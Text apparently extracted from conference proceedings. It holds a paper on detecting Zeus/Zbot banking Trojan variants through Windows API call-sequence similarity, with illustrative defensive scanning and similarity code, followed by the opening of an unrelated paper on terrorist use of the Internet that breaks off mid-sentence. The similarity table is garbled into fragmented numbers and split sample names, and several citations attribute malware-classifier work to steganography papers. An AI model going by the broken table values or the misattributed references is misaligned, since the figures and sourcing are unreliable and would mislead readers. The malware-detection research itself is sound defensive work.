Present anti-virus techniques are based either on signature-based detection, which is not effective against polymorphic and unknown malware, or on heuristic-based algorithms, which are inefficient and inaccurate. Detection based on string signatures uses a database of regular expressions and a string matching engine to scan files and detect infected ones. Each regular expression in the database is designed to identify a known malicious program. Though traditional signature-based malware detection methods have existed for ages, there is much to improve in signature-based detection, and a few data mining and machine learning techniques have been proposed to detect new malware. (Westfeld, 2001: 289-302), (Sallee, 2005: 167-189) and (Solanki, Sarkar and Manjunath, 2007: 16-31) examined the performance of various classifiers such as Naïve Bayes and support vector machines (SVM), plotting ROC curves using decision tree methods. (Lyu and Farid, 2002: 340-354) applied Objective-Oriented Association (OOA) mining based classification (Fridrich, 2004: 67-81), (Shi, Chen and Chen, 2006) on Windows API execution sequences called by PE files. A few of these methods rely entirely on the occurrence of the API execution sequence. There are also methods where websites are crawled to inspect whether they host any kind of malicious executables (Pevny, Fridrich, 2007). This line of study mainly concerns web server security, advertising and third-party widgets; its basic approach shows how malware executables are often distributed across a large number of URLs and domains. Analyzing and detecting these obfuscated malicious executables is itself a vast field.<br />
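String-signature scanning as described above can be sketched as a database of regular expressions matched against file bytes. The signatures below are hypothetical placeholders, not real anti-virus rules.<br />

```python
import re

# hypothetical signature database: name -> regex over the file's raw bytes
SIGNATURES = {
    "Zbot.generic": re.compile(rb"bot\.exe.{0,64}LoadLibraryA", re.DOTALL),
    "Eicar.test":   re.compile(rb"EICAR-STANDARD-ANTIVIRUS-TEST-FILE"),
}

def scan(data: bytes):
    """Return the names of all signatures that match the given file content."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(data)]

sample = b"...bot.exe\x00\x00payload calls LoadLibraryA..."
hits = scan(sample)
```

A polymorphic builder defeats exactly this scheme: since every emitted binary has different bytes, no fixed pattern in such a database keeps matching.<br />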

Our work is based on a collection of Zeus/Zbot variants collected at Offensive Computing (Offensive Computing, 2010). As of today, Offensive Computing has one of the largest malware databases, which includes various kinds of executables such as spyware, adware, viruses, worms, Trojans, etc. Among the thousands of malware samples in the computing world, the number of unique executables is likely to be much lower, as many binaries differ only in binary packing (Chen and Shi, 2008) and not in their functionality. In this paper we show how Zeus/Zbot variants can be detected effectively.<br />

In our recent engagements we used this methodology to detect variants of Conficker, Zeus Crimeware, and data stealers that bypassed several popular antivirus tools, host-based security tools, and perimeter security devices.<br />

In this paper, we present an API call sequence approach to detect Zeus samples. Our approach rests on the analysis of Windows API call sequences, applying distance measures to determine how similar the variants are.<br />

In summary, the main contribution of this paper is to detect Zeus effectively. In the introduction, we discuss a few lethal malware families and how important it is to find a good defensive mechanism. Next we describe the evolution of Zeus, followed by its reverse-engineered results. In the following section we explain our method of analyzing Zeus. Finally, we present our conclusions based on our experiments, followed by the references.<br />

2. Evolution of Zeus/Zbot<br />

Zeus is a Trojan horse that steals banking information from infected machines and spreads using drive-by-downloads and phishing emails. Its persistence is due to the large number of attackers using the Zeus builder. These attackers pay thousands of dollars for the latest Zeus builders, which produce up-to-date undetectable bot builds (Shevchenko, 2009). Every day new Zeus/Zbot samples are distributed, created by modifying the bots being produced in the wild, or by layering all sorts of packers and encryption on top, a few using custom-built packers. Before release, these samples are uploaded to multi-anti-virus scanners to make sure they are not detected by any anti-virus vendor.<br />

The worst aspect of Zeus/Zbot is its latest generation of bots, which use rootkit techniques to hide their presence on the infected machine and inject additional fields into online Internet banking websites. The details entered there are collected and sent to remote systems, where they are later stored in a remote database. From this database the attacker uses the stolen user credentials to transfer the desired amount to his account.<br />

In July 2007, Zeus was first found infecting the United States Department of Transportation, stealing data from over 1000 PCs (Wikipedia, 2010), (Ragan, 2009). As of October 2009, 1.5 million phishing messages had been sent through Facebook. In November 2009, malicious spam emails purporting to be from Verizon Wireless were spreading Zeus (Moscaritolo, 2009). On October 1, 2010 it was reported that a major cyber crime network had hacked into US computers using Zeus and stolen around $70 million (Wikipedia, 2010). Since its discovery, gangs have netted more than $200 million (McMillan and Kirk, 2010).<br />

3. Reverse engineering Zeus/Zbot<br />

Zeus has been in the wild since 2006. Though its main methods of propagation are spam campaigns and drive-by downloads, due to its versatile nature other vectors may also be utilized. The user may receive a masquerading email message as if it were from a well-known organization such as the FDIC, IRS, Facebook or Microsoft. The message body warns the user about a financial problem and suggests visiting the link provided in the message body. Once the user visits the link, the Trojan gets downloaded and compromises the host machine.<br />

Based on the behavior of the executable (Qureshi), Zeus can be classified as a Trojan. Zeus propagates using drive-by-downloads and phishing emails. It uses compromised FTP servers and peer-to-peer networks to spread but, unlike a worm, the end user has to initiate the download. Once Zeus is downloaded onto a computer, it installs itself and tries to connect to the botnet's command and control servers for further instructions. From the command and control servers it downloads configuration files and infects the browser. Later the malware monitors browser activities and steals the appropriate data based on the encrypted information in the configuration file. Since it hooks into services like svchost to act as a man in the browser, it also shows characteristics of a virus.<br />

Figure (1) shows that the Trojan is packed using UPX, one of the most widely used packers, and Figure (2) shows its opcode instructions with the initial EntryPoint. Figure (3) shows that the Trojan is packed and encrypted with the custom-made Zeus builder and Figure (4) shows its opcode instructions.<br />



Figure 1: UPX packed Trojan<br />

Figure 2: Opcode instructions with entry points<br />


Figure 3: Trojan packed and encrypted with the custom made Zeus builder<br />


Figure 4: Opcode instructions with entry points for the Trojan with custom made Zeus builder<br />

According to our observations, though these two Trojans were created using different packers, their use of the Windows API is almost identical. We observed the API call sequences of both Trojans. When we applied distance measures after aligning their API sequences, we found they are about 92.32% similar to each other. This shows that, irrespective of the obfuscation method used to create Zeus variants, our methodology can detect these Trojans.<br />

4. Analysis methodology<br />

First, the Zeus sample is decompressed and passed through a PE file parser, producing an intermediate representation which consists of a Windows API calling sequence. This sequence is compared to a known malware sequence or signature (from the signature database) and is passed through the similarity measure module to generate the similarity report. The detection decision is made based on this similarity report. The PE binary parser transforms the PE binary file into an API calling sequence. It uses two components: W32Dasm version 8.9 and a text parser for the disassembled code. W32Dasm by URSoftware Co. is a commercial disassembler, which disassembles the PE code and outputs assembly instructions, imported modules, imported APIs, and resource information. The text parser parses the output from W32Dasm into a static API calling sequence, which becomes our signature.<br />
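The similarity measure module can be sketched with a longest-common-subsequence ratio over two static API calling sequences. The exact distance measure used is not reproduced here, so `lcs_similarity` and the sample sequences below are our own illustrative assumptions.<br />

```python
def lcs_len(a, b):
    """Length of the longest common subsequence of two API call sequences."""
    dp = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i, x in enumerate(a, 1):
        for j, y in enumerate(b, 1):
            dp[i][j] = dp[i-1][j-1] + 1 if x == y else max(dp[i-1][j], dp[i][j-1])
    return dp[len(a)][len(b)]

def lcs_similarity(a, b):
    """Similarity score in percent, normalized by the longer sequence."""
    return 100.0 * lcs_len(a, b) / max(len(a), len(b))

# hypothetical static API calling sequences as produced by the
# disassembler + text parser for two variants of the same family
variant1 = ["GetModuleHandleA", "LoadLibraryA", "GetProcAddress",
            "VirtualAlloc", "WriteProcessMemory", "CreateRemoteThread"]
variant2 = ["GetModuleHandleA", "LoadLibraryA", "GetProcAddress",
            "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"]
score = lcs_similarity(variant1, variant2)   # 5 of 6 calls align -> ~83.3%
```

Because packing changes the bytes but not the behavior, two differently packed variants still yield closely aligned API sequences and hence a high score.<br />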

Table 1: Similarity analysis of Zeus/Zbot compared among different variants (matrix of pairwise similarity scores, in percent)<br />

86<br />

52.<br />

05<br />

60.<br />

01<br />

79.<br />

93<br />

66.<br />

52<br />

73.<br />

46<br />

67.<br />

71<br />

65.<br />

30<br />

58.<br />

36<br />

79.<br />

45<br />

73.<br />

13<br />

46.<br />

47<br />

63.<br />

33<br />

64.<br />

95<br />

257<br />

Troj<br />

an.S<br />

py.Z<br />

eus.<br />

1.Ge<br />

n.m<br />

al<br />

55.0<br />

1<br />

70.9<br />

0<br />

100.<br />

00<br />

67.5<br />

2<br />

30.2<br />

3<br />

64.6<br />

9<br />

61.8<br />

1<br />

40.0<br />

0<br />

64.7<br />

5<br />

71.8<br />

8<br />

71.0<br />

9<br />

74.1<br />

7<br />

77.2<br />

0<br />

72.5<br />

4<br />

53.3<br />

1<br />

67.9<br />

8<br />

70.0<br />

6<br />

41.9<br />

1<br />

67.5<br />

3<br />

71.1<br />

3<br />

Troj<br />

an.S<br />

py.Z<br />

eus.<br />

1.Ge<br />

n.m<br />

al<br />

Troja<br />

n.Zbo<br />

t-<br />

290.<br />

mal<br />

Troja<br />

n.Spy<br />

.Zeus<br />

.1.Ge<br />

n.mal<br />

76.7<br />

1 80.02 58.13<br />

81.7<br />

1 54.58 42.36<br />

66.6<br />

9 96.12 54.59<br />

100.<br />

00 51.16 54.44<br />

53.7<br />

3<br />

74.6<br />

3 61.09<br />

100.0<br />

0 21.68<br />

100.0<br />

0<br />

63.1<br />

1<br />

62.5<br />

61.11 57.36<br />

6 66.98 41.70<br />

78.7<br />

2 76.44 60.37<br />

84.0<br />

5 85.10 80.75<br />

72.3<br />

5 53.98 63.05<br />

85.2<br />

8 92.50 70.64<br />

70.9<br />

9<br />

69.1<br />

79.78 75.07<br />

2 75.56 69.18<br />

78.0<br />

0<br />

67.8<br />

64.52 65.70<br />

4<br />

75.0<br />

67.21 70.49<br />

0 51.33 61.99<br />

47.0<br />

1 36.19 27.44<br />

71.3<br />

3 41.23 49.47<br />

64.1<br />

8 85.66 48.82<br />

Troj<br />

an.Z<br />

bot-<br />

115<br />

1.m<br />

al<br />

81.3<br />

8<br />

74.6<br />

0<br />

62.0<br />

7<br />

79.1<br />

0<br />

42.6<br />

4<br />

79.6<br />

6<br />

100.<br />

00<br />

60.1<br />

0<br />

74.2<br />

4<br />

76.9<br />

8<br />

81.0<br />

5<br />

67.2<br />

1<br />

74.7<br />

2<br />

74.2<br />

0<br />

81.7<br />

3<br />

78.1<br />

5<br />

74.1<br />

7<br />

62.2<br />

9<br />

82.6<br />

5<br />

57.2<br />

8<br />

DHL<br />

_DO<br />

C.m<br />

al<br />

94.4<br />

6<br />

82.9<br />

1<br />

73.7<br />

4<br />

66.5<br />

3<br />

68.1<br />

3<br />

86.2<br />

4<br />

59.7<br />

3<br />

100.<br />

00<br />

90.7<br />

7<br />

88.7<br />

8<br />

79.3<br />

2<br />

88.5<br />

8<br />

79.6<br />

6<br />

71.8<br />

5<br />

91.7<br />

5<br />

80.0<br />

6<br />

72.9<br />

7<br />

53.7<br />

2<br />

71.6<br />

6<br />

73.7<br />

6<br />

Troj<br />

an.<br />

Spy.<br />

Zeu<br />

s.1.<br />

Gen<br />

.mal<br />

68.9<br />

1<br />

57.0<br />

6<br />

71.5<br />

6<br />

61.7<br />

5<br />

51.3<br />

0<br />

71.8<br />

5<br />

68.9<br />

8<br />

47.2<br />

8<br />

100.<br />

00<br />

86.4<br />

1<br />

77.8<br />

9<br />

83.5<br />

2<br />

85.1<br />

6<br />

72.7<br />

1<br />

59.1<br />

7<br />

79.5<br />

9<br />

68.1<br />

6<br />

41.1<br />

5<br />

57.5<br />

6<br />

70.8<br />

3


Trojan.Sp<br />

y.Zeus.1.<br />

Gen.mal<br />

Trojan.Zb<br />

ot-<br />

1307.mal<br />

Trojan.Zb<br />

ot-<br />

2163.mal<br />

Tro<br />

jan.<br />

Sp<br />

y.Z<br />

eus<br />

.1.<br />

Ge<br />

n.<br />

mal<br />

54.<br />

23<br />

57.<br />

10<br />

63.<br />

53<br />

Troj<br />

an.Z<br />

bot-<br />

85.<br />

mal<br />

Madhu Shankarapani and Srinivas Mukkamala<br />

Troja<br />

n.Spy<br />

.Zeus<br />

.2.Ge<br />

n.mal<br />

63.8<br />

2 78.15<br />

58.4<br />

6 63.92<br />

56.5<br />

1 81.88<br />

Troj<br />

an.B<br />

roke<br />

r-<br />

12.<br />

mal<br />

61.3<br />

3<br />

78.4<br />

7<br />

84.0<br />

4<br />

5. Similarity analysis results<br />


We apply the traditional similarity functions to Vs' and Vu'. The cosine measure, the extended Jaccard measure, and the Pearson correlation measure are popular similarity measures for sequences. The cosine measure is given below and captures a scale-invariant understanding of similarity.<br />

Cosine similarity: cosine similarity measures the similarity between two vectors of n dimensions by finding the angle between them:<br />

cos(Vs', Vu') = (Vs' · Vu') / (‖Vs'‖ ‖Vu'‖) (1)<br />

Extended Jaccard measure: the extended Jaccard coefficient measures the degree of overlap between two sets and is computed as the ratio of the number of shared attributes of Vs' AND Vu' to the number possessed by Vs' OR Vu':<br />

EJ(Vs', Vu') = (Vs' · Vu') / (‖Vs'‖² + ‖Vu'‖² − Vs' · Vu') (2)<br />

Pearson correlation: correlation gives the linear relationship between two variables. For a series of n measurements of the variables Vs' and Vu', the Pearson correlation is given by the formula below:<br />

r(Vs', Vu') = [ Σᵢ (xᵢ − x̄)(yᵢ − ȳ) ] / [ (n − 1) σVs' σVu' ] (3)<br />

where xᵢ and yᵢ are the values of Vs' and Vu' respectively at position i, n is the number of measurements, σVs' and σVu' are the standard deviations of Vs' and Vu' respectively, and x̄ and ȳ are the means of Vs' and Vu' respectively.<br />
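The three measures can be sketched in plain Python over two equal-length API-call frequency vectors (an illustrative sketch under that vector encoding, not the authors' implementation):

```python
import math

def cosine(a, b):
    # Scale-invariant similarity from the angle between the vectors (eq. 1).
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0

def extended_jaccard(a, b):
    # Degree of overlap: shared weight over combined weight (eq. 2).
    dot = sum(x * y for x, y in zip(a, b))
    denom = sum(x * x for x in a) + sum(y * y for y in b) - dot
    return dot / denom if denom else 0.0

def pearson(a, b):
    # Linear correlation between the two series of measurements (eq. 3).
    n = len(a)
    mean_a, mean_b = sum(a) / n, sum(b) / n
    cov = sum((x - mean_a) * (y - mean_b) for x, y in zip(a, b))
    sd_a = math.sqrt(sum((x - mean_a) ** 2 for x in a))
    sd_b = math.sqrt(sum((y - mean_b) ** 2 for y in b))
    return cov / (sd_a * sd_b) if sd_a and sd_b else 0.0
```

For vectors with zero norm or zero variance the functions fall back to 0.0 rather than dividing by zero.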

In these experiments, we calculated the mean value of the three measures. For a particular measure m, S(m)(Vs'i, Vu') stands for the similarity between virus signature i and a suspicious binary file. Our similarity report is generated by calculating the S(m)(Vs'i, Vu') value for each virus signature in the signature database.<br />

In this experiment, we compared the Zeus/Zbot variants against each other, creating an n-by-n matrix that shows how similar the variants are. Table 1 shows the similarity values of the Zeus/Zbot variants compared among themselves. From Table 1 we can infer that the variants of Zeus/Zbot are highly similar in the sequence in which the Windows APIs are called.<br />
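The n-by-n comparison can be sketched as follows; the helper name `similarity_matrix` and the use of cosine alone as the default measure are illustrative assumptions, and in the paper's setup the mean of all three measures would be taken:

```python
import math

def cosine(a, b):
    # Angle-based similarity between two equal-length vectors.
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0

def similarity_matrix(vectors, measures=(cosine,)):
    # n-by-n matrix of mean similarity over the chosen measures;
    # the diagonal compares each variant with itself.
    n = len(vectors)
    return [[sum(m(vectors[i], vectors[j]) for m in measures) / len(measures)
             for j in range(n)] for i in range(n)]
```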

6. Conclusion<br />

In this paper, we present our approach to malware detection based on Windows API call sequences. According to our observations, although there has been a tremendous increase in Zeus/Zbot variant builders, the behavior of the API calls remains almost the same. Thus our approach can detect these variants robustly and efficiently. Experimental results show that our method is able to quantify how similar these variants are, even though they have evaded present virus defense systems, and how accurately Zeus/Zbot variants can be detected.<br />

References<br />

Bell, Henry and Chien, Eric. (2010) Trojan.Vundo, Symantec Technical Report [online], 17 Mar, Available:<br />

http://www.symantec.com/security_response/writeup.jsp?docid=2004-112111-3912-99 [12 Sep 2010].<br />

Chen, C. and Shi, Y. Q. (2008) “JPEG image steganalysis utilizing both intrablock and interblock correlations”,<br />

IEEE International Symposium on Circuits and Systems, Seattle, WA, 18-21 May.<br />

Cooke, E., Jahanian, F. and McPherson, D. (2006) “The zombie roundup: Understanding, detecting, and<br />

disrupting botnets”, in Usenix Workshop on Steps to Reducing Unwanted Traffic on the Internet (SRUTI).<br />

Freiling, F., Holz, T. and Wicherski, G. (2005) “Botnet Tracking: Exploring a Root-Cause Methodology to Prevent<br />

Distributed Denial-of-Service Attacks”, in <strong>European</strong> Symposium on Research in Computer Security<br />

(ESORICS).<br />

Fridrich, J. (2004) "Feature-based steganalysis for JPEG images and its implications for future design of<br />

steganographic schemes", in Information Hiding, <strong>6th</strong> International Workshop, LNCS 3200, pp. 67-81.<br />

Holz, T., Engelberth, M. and Freiling, F. (2008) Learning More About the Underground Economy: A Case-Study<br />

of Keyloggers and Dropzones, ReiheInformatik TR-2008-006, University of Mannheim.<br />

Kanich, C., Levchenko, K., Enright, B., Voelker, G. and Savage, S. (2008) “The Heisenbot Uncertainty Problem:<br />

Challenges in Separating Bots from Chaff”, in USENIX Workshop on Large-Scale Exploits and Emergent<br />

Threats.<br />

Karasaridis, A., Rexroad, B. and Hoeflin, D. (2007) “Wide-scale botnet detection and characterization”, in<br />

USENIX Workshop on Hot Topics in Understanding Botnet.<br />

Lyu, S. and Farid, H. (2002) "Detecting hidden messages using higher order statistics and support vector<br />

machines", in Information Hiding, 5th International Workshop, LNCS 2578, pp. 340-354.<br />

McMillan, Robert and Kirk, Jeremy. (2010) US charges 60 in connection with Zeus Trojan [online], 30 Sep,<br />

Available: http://www.csoonline.com/article/620830/us-charges-60-in-connection-with-zeus-trojan [1 Oct<br />

2010].<br />

Moscaritolo, Angela. (2009) New Verizon Wireless-themed Zeus campaign hits [online], 16 Nov,<br />

Available:http://www.scmagazineus.com/new-verizon-wireless-themed-zeus-campaign-hits/article/157848<br />

[8 Sep 2010].<br />

Nichols, Shaun. (2009) UCSB researchers hijack Torpig botnet [online], V3.co.uk, 04 May, Available:<br />

http://www.v3.co.uk/vnunet/news/2241609/researchers-hijack-botnet [06 May 2009].<br />

Offensive Computing [online], Available: http://offensivecomputing.net [21 Jul 2010].<br />

Pevny, T., and Fridrich, J. (2007) “Merging Markov and DCT features for multi-class JPEG steganalysis”, in<br />

Proceedings of SPIE Electronic Imaging, Photonics West, pp. 03-04.<br />

Qureshi, Mohammad. MBCS, MIET [online], Available: http://umer.quresh.info/Network%20Attacks.pdf [13 Dec 2010].<br />

Ragan, Steve. (2009) ZBot data dump discovered with over 74,000 FTP credentials [online], 29 Jun, Available:<br />

http://www.thetechherald.com/article.php/200927/3960/ZBot-data-dump-discovered-with-over-74-000-FTPcredentials<br />

[5 Jul 2009].<br />

Rajab, M. A., Zarfoss, J., Monrose, F. and Terzis, A. (2006) “A Multifaceted Approach to Understanding the<br />

Botnet Phenomenon”. ACM Internet Measurement <strong>Conference</strong> (IMC).<br />

Rajab, M. A., Zarfoss, J., Monrose, F. and Terzis, A. (2007) “My Botnet is Bigger than Yours (Maybe, Better than<br />

Yours): Why Size Estimates Remain Challenging”, in USENIX Workshop on Hot Topics in Understanding<br />

Botnet.<br />

Ramachandran, A., Feamster, N. and Dagon, D. (2006) “Revealing Botnet Membership Using DNSBL Counter-<br />

Intelligence”, in <strong>Conference</strong> on Steps to Reducing Unwanted Traffic on the Internet.<br />

Sallee, P. (2005) “Model based methods for steganography and steganalysis”, International Journal of Image and<br />

Graphics, Vol. 5, No. 1, 2005, 167-189.<br />

Shevchenko, Sergei. (2009) Time to Revisit Zeus Almighty [online], 16 Sep, Available:<br />

http://blog.threatexpert.com/2009_09_01_archive.html [19 Sep 2009].<br />

Shi, Y. Q., Chen, C. and Chen, W. (2006) "A Markov process based approach to effective attacking JPEG<br />

steganography", in Proceedings of the 8th international conference on Information hiding.<br />

Solanki, K., Sarkar, A. and Manjunath, B. S. (2007) "YASS: Yet another steganographic scheme that resists blind<br />

steganalysis", in Proceedings of 9th Information Hiding Workshop, ISBN 3-540-77369-X / 978-3-540-77369-6, pp. 16-31, Saint Malo, France.<br />

Stone-Gross, B., Cova, M., Cavallaro, L., Gilbert, B., Szydlowski, M., Kemmerer, R., Kruegel, C. and Vigna, G.<br />

(2009) “Your Botnet is My Botnet: Analysis of a Botnet Takeover”, CCS’09, 9–13 Nov, Chicago, Illinois,<br />

USA.<br />

Westfeld, A. (2001) “High capacity despite better steganalysis (F5-a steganographic algorithm)”, Information<br />

Hiding, 4th International Workshop, LNCS 2137, pp. 289-302, Springer-Verlag Berlin Heidelberg.<br />

Zeus (trojan horse). Wikipedia [online], Available: http://en.wikipedia.org/wiki/Zeus_(trojan_horse), [12 Sep 2010].<br />

Zhuang, L., Dunagan, J., Simon, D., Wang, H., Osipkov, I., Hulten, G. and Tygar, J. (2008) “Characterizing<br />

botnets from email spam records”, in USENIX Workshop on Large-Scale Exploits and Emergent Threats.<br />

259


Terrorist use of the Internet: Exploitation and Support<br />

Through ICT Infrastructure<br />

Namosha Veerasamy and Marthie Grobler<br />

Council for Scientific and Industrial Research, Pretoria, South Africa<br />

nveerasamy@csir.co.za<br />

mgrobler1@csir.co.za<br />

Abstract: The growth of technology has provided a wealth of functionality. One area in which Information<br />

Communication Technology (ICT), especially the Internet, has grown to play a supporting role is terrorism. The<br />

Internet provides an enormous amount of information, and enables relatively cheap and instant communication<br />

across the globe. As a result, the conventional view of many traditional terrorist groups shifted to embrace the<br />

use of technology within their functions. The goal of this paper is to represent the functions and methods that<br />

terrorists have come to rely on through the ICT infrastructure. The discussion sheds light on the technical and<br />

practical role that ICT infrastructure plays in the assistance of terrorism. The use of the Internet by terrorist<br />

groups has expanded from traditional Internet usage to more innovative usage of both traditional and new<br />

Internet functions. Global terrorist groups can now electronically target an enormous amount of potential<br />

recipients, recruitees and enemies. The aim of the paper is to show how the Internet can be used to enable<br />

terrorism, as well as provide technical examples of the support functionality and exploitation. This paper<br />

summarises the high-level functions, methods and examples for which terrorists utilise the Internet. This paper<br />

looks at the use of the Internet as both a uni-directional and bi-directional tool to support functionality like<br />

recruitment, propaganda, training, funding and operations. It also discusses specific methods like the<br />

dissemination of web literature, social-networking tools, anti-forensics and fund-raising schemes. Additional<br />

examples, such as cloaking and coding techniques, are also provided. In order to analyse how ICT infrastructure<br />

can be used in the support of terrorism, a mapping is given of communication direction to the traditional Internet<br />

use functions and methods, as well as to innovative Internet functions and methods.<br />

Keywords: anti-forensics, internet, terrorism, ICT, propaganda, social-networking<br />

1. Introduction<br />

According to the Internet World Stats webpage, the latest number of world Internet users (calculated<br />

30 June 2010) is 1 966 541 816, representing a 28.7% penetration of the world population (2010).<br />

Although this does not reflect a majority of the world population, it presents an enormous amount of<br />

potential recipients, recruitees and enemies that global terrorist groups can target electronically.<br />

However, terrorist groups’ embracing of technology used to be an uncommon phenomenon.<br />

In the book The Secret History of al Qaeda, an eyewitness to the al Qaeda men fleeing United States bombardments of their training camps in November 2001 is quoted: "Every second al Qaeda member [was] carrying a laptop computer along with his Kalashnikov" (Atwan 2006). The scenario is highly paradoxical: an organisation utterly opposed to the modern world (such as al Qaeda) increasingly relies on the hi-tech electronic facilities offered by the Internet to operate, expand, develop<br />

and survive. Especially in the early 1980s, some groups in Afghanistan were opposed to using any<br />

kind of technology that is of largely Western origin or innovation (Atwan 2006).<br />

However, the world has changed. Technology has been introduced into most aspects of daily life, and<br />

the Internet has become a prominent component of business and private life. It provides an enormous<br />

amount of information and enables relatively cheap and instant communication across the globe. As a<br />

result, the traditional view of many traditional terrorist groups shifted to embrace the use of technology<br />

within their functions. In 2003, a document titled 'al Qaeda: The 39 principles of Jihad' was published<br />

on the al-Farouq website. Principle 34 states that 'performing electronic jihad' is a 'sacred duty'. The<br />

author of the principle document calls upon the group's members to participate actively in Internet<br />

forums. He explains that the Internet offers the opportunity to respond instantly and to reach millions<br />

of people in seconds. Members who have Internet skills are urged to use them to support the jihad by<br />

hacking into and destroying enemy websites (Atwan 2006).<br />

Keeping this principle in mind, the use of the Internet by terrorist groups has expanded from only<br />

traditional Internet usage to more innovative usage of both traditional and new Internet functions. This<br />

paper will summarise the high-level functions, methods and examples for which terrorists utilise the<br />

Internet. The examples and methods often provide for various functions and thus a strict one-to-one<br />

260


Namosha Veerasamy and Marthie Grobler<br />

mapping cannot be provided. Rather, the examples given shed light on the technical and practical role<br />

that ICT infrastructure plays in the support of terrorism.<br />

2. Functionality of the internet<br />

Terrorists use the Internet because it is easy and inexpensive to disseminate information<br />

instantaneously worldwide (Piper 2008). By its very nature, the Internet is in many ways an ideal<br />

arena for activity by terrorist groups. The Internet offers little or no regulation, is an anonymous<br />

multimedia environment, and has the ability to shape coverage in the traditional mass media<br />

(Weimann 2005).<br />

Whilst the Internet was originally created to facilitate communication between two computers, its<br />

functionality now extends to serving as an information repository as well. Figure 1 shows the general functions that<br />

terrorists may use the Internet for, with an indication of which type of methods are used for each<br />

functionality type.<br />

Recruitment – the process of attracting, screening and selecting individuals to become members<br />

of the terrorist groups; both web literature and social networking tools can be applied for this<br />

purpose.<br />

Training – the process of disseminating knowledge, skills and competency to new recruits with<br />

regard to specific topics of knowledge that may be needed during terrorist operations; social<br />

networking tools and anti-forensics methods are employed for this purpose.<br />

Communication – the process of conveying information to members of the terrorist group; social<br />

networking tools and anti-forensics methods are employed for this purpose.<br />

Operations – the direction and control of a specific terrorist attack; web literature, anti-forensics<br />

and fundraising methods are employed for this purpose.<br />

Propaganda – a form of communication aimed at influencing the terrorist community toward a<br />

specific cause; both web literature and social networking tools can be applied for this purpose.<br />

Funding – financial support provided to make a specific terrorist operation possible; fundraising<br />

methods are used for this purpose.<br />

Psychological warfare – the process of spreading disinformation in an attempt to deliver threats<br />

intended to instil fear and helplessness within the enemy ranks; both web literature and social<br />

networking tools can be applied for this purpose.<br />

The Internet is the perfect tool to exploit in order to support terrorist activities. Not only does it provide<br />

location independence, speed, anonymity and internationality, but it also provides a relatively low<br />

cost-benefit ratio (Brunst 2010), making it a desirable tool. Figure 1 shows the complexity of terrorist<br />

groups' use of the Internet (as both traditional communication and information gathering tool) in<br />

innovative new ways. The Internet is also used as both a uni-directional and a bi-directional<br />

communication tool.<br />

Although this list of functionalities is not exhaustive, it provides a better understanding of the need for<br />

specific methods to exploit the ICT infrastructure to support terrorist activities. The next section<br />

discusses the methods in more detail, and explains these with actual examples.<br />

3. Exploiting the ICT infrastructure to support terrorist activities<br />

For the purpose of this article, Internet exploitation methods are divided into four distinct groups: web<br />

literature, social networking tools, anti-forensics and fundraising. Figure 2 shows these groups with<br />

some examples of how the methods may be employed.<br />

3.1 Web literature<br />

Web literature refers to all writings published on the web in a particular style on a particular subject.<br />

Some of the types of web literature facilitated by terrorist groups include published periodicals and<br />

essays, manuals, encyclopaedias, poetry, videos, statements and biographies. Since web literature<br />

often takes on the form of mass uni-directional communication, this media is ideal for terrorist use in<br />

recruitment, operations, training and propaganda.<br />

261


Namosha Veerasamy and Marthie Grobler<br />

Figure 1: The Internet as terrorist supporting mechanism<br />

Figure 2: Examples of how terrorists may use the Internet<br />

262


Namosha Veerasamy and Marthie Grobler<br />

Radio Free Europe/Radio Liberty compiled a special report on the use of media by Sunni Insurgents<br />

in Iraq and their supporters worldwide. This report discusses the products produced by terrorist media<br />

campaigns, including text, audiovisual and websites (Kimmage, Ridolfo 2007). The distribution of text<br />

and audiovisual media is a traditional use of the Internet, with little innovative application. Text media<br />

include press releases, operational statements, inspirational texts and martyr biographies. Audiovisual<br />

media include recordings of al Qaeda operations in Iraq (Atwan 2006). Online training material can<br />

provide detailed instructions on how to make letter bombs; use poison and chemicals; detonate car<br />

bombs; shoot US soldiers; navigate by the stars (Coll, Glasser 2005) and assemble a suicide bomb<br />

vest (Lachow, Richardson 2007).<br />

The use of dedicated websites within terrorist circles is prominent. By the end of 1999, most of the 30<br />

organisations designated as Foreign Terrorist Organisations maintained a web presence<br />

(Weimann 2009). By 2006, this number had grown to over 5000 active websites (Nordeste, Carment<br />

2006). These websites generally provide current activity reports and vision and mission statements of<br />

the terrorist group. Sympathetic websites focus largely on propaganda. These websites have postings<br />

of entire downloadable books and pamphlet libraries aimed at indoctrinating jihadi sympathizers and<br />

reassuring already indoctrinated jihadists (Jamestown Foundation 2006). Pro-insurgent websites focus<br />

on providing detailed tutorials to group members, e.g. showing how to add news crawls that provide<br />

the latest, fraudulent death toll for US forces in Iraq.<br />

According to an al Qaeda training manual, it is possible to gather at least 80% of all information<br />

required about the enemy by using public Internet sources openly and without resorting to illegal<br />

means (Weimann 2005). More than 1 million pages of historical government documents have been<br />

removed from public view since the 9/11 terror attacks. This "record of concern" program aims to<br />

"reduce the risk of providing access to materials that might support terrorists". Among the removed<br />

documents is a database from the Federal Emergency Management Agency with information about all<br />

federal facilities, and 200 000 pages of naval facility plans and blueprints. The data is removed from<br />

the public domain, but individuals can still request to see parts of the withdrawn documents under the<br />

Freedom of Information Act (Bass, Ho 2007).<br />

Other examples of web literature and information collected through the Internet include maps, satellite<br />

photos of potential attack sites, transportation routes, power and communication grids, infrastructure<br />

details, pipelines systems, dams and water supplies, information on natural resources and email<br />

distribution lists. Although this type of information may not necessarily be useful in cyberterrorism<br />

activities, it can be used to plan traditional terrorism activities without actually going to the<br />

geographical location of the target. Some terrorist groups have recently been distributing flight<br />

simulation software. Web literature can thus be used in the initial recruitment campaigns by glorifying<br />

terrorism through inspirational media, as well as the training of members, propaganda and the<br />

operations of the terrorist group.<br />

3.2 Social networking tools<br />

Social networking tools focus on building and reflecting social networks or social relations among<br />

people who share a common interest. Some types of social networking tools facilitated by terrorist<br />

groups include online forums and blogs, websites, games, virtual personas, music and specialised<br />

applications. Social networking tools offer both uni-directional and bi-directional communications, and<br />

can be used for recruitment, training, propaganda and communication within terrorist groups.<br />

Social networking and gaming sites often require new members to create accounts by specifying their<br />

names, skills and interests. Through the creation of these virtual personas, terrorist groups are able to<br />

gather information on potential recruits. Individuals with strong technical skills in the fields of<br />

